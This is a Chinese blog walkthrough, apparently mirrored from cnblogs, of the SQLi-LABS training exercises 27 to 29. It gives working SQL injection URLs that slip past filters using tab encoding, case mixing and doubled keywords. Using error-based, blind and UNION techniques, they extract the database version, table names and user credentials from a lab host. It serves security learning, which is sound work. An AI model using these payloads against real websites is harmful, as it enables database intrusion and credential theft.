zoukankan      html  css  js  c++  java

  • SQLi-LABS Page-2 (Adv Injections) Less27-Less29

    Less-27

    GET - Error Based- All your UNION and select belong to us

    过滤了union 和select的报错注入

    查看源码:

    使用%09 替换空格,大小写混淆绕过,关键字符,双写等绕过 UNiON,SElecT ununionion seselectlect

    payload:

    http://10.10.202.112/sqli/Less-27/?id=1' %09and %09updatexml(null,concat(0x0a,(SELect%09version())),null) %09and 's'='s

    http://10.10.202.112/sqli/Less-27/?id=1'  %09and%09 extractvalue(0x0a,concat(0x0a,(selECt %09table_name %09from %09information_schema.tables %09where %09table_schema=database()%09 limit %090,1)))%09and 's'='s

    Less-27a

    GET - Blind Based- All your UNION  and SELE belong to us

    http://10.10.202.112/sqli/Less-27a?id=1" #报错

    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:phpStudy2018PHPTutorialWWWsqliLess-27aindex.php on line 37

    http://10.10.202.112/sqli/Less-27a?id=1"  and "s"="s #闭合

    这里采用盲注:

    http://10.10.202.112/sqli/Less-27a?id=1" %09and %09substr(@@version,1,1)=5 %09and %09"s"="s  #true

    http://10.10.202.112/sqli/Less-27a?id=1" %09and %09substr(@@version,1,1)=4 %09and %09"s"="s  #false

    Less-28

    GET - Error Based- All your UNION AND SELE BELONG to us

    SQL

    SELECT * FROM users WHERE id=('$id') LIMIT 0,1

    http://10.10.202.112/sqli/Less-28?id=1' #报错

    http://10.10.202.112/sqli/Less-28?id=1') and ('s')=('s #闭合

    http://10.10.202.112/sqli/Less-28?id=1000') %09UNION%09ALL%09SELECT%091,user(),3%09and %09('s')=('s

    Less-28a

    GET - Blind Based- All your UNION AND SELET to BELONG TO us

    http://10.10.202.112/sqli/Less-28a?id=1') --+ #闭合

    http://10.10.202.112/sqli/Less-28a?id=1') order by 4--+ #false

    http://10.10.202.112/sqli/Less-28a?id=1') order by 3--+ #=true

    http://10.10.202.112/sqli/Less-28a?id=10000') +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+users),3--+

    Less-29

    GET -Error based- IMPIDENCE MISMATCH- Ha

    http://10.10.202.112/sqli/Less-29?id=1' #报错

    http://10.10.202.112/sqli/Less-29?id=1'--+ #闭合

    http://10.10.202.112/sqli/Less-29?id=-1' +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3--+

    待续。。。。
  • 相关阅读:
    开工--行胜于言
    操作系统之内存管理
    C陷阱与缺陷读书笔记(一)
    关于复杂度的一些基本的定义
    归并排序
    快速排序
    前序中序后序非递归遍历
    直接插入排序
    冒泡排序
    程序内存映像
  • 原文地址:https://www.cnblogs.com/hack404/p/11084148.html
Copyright © 2011-2022 走看看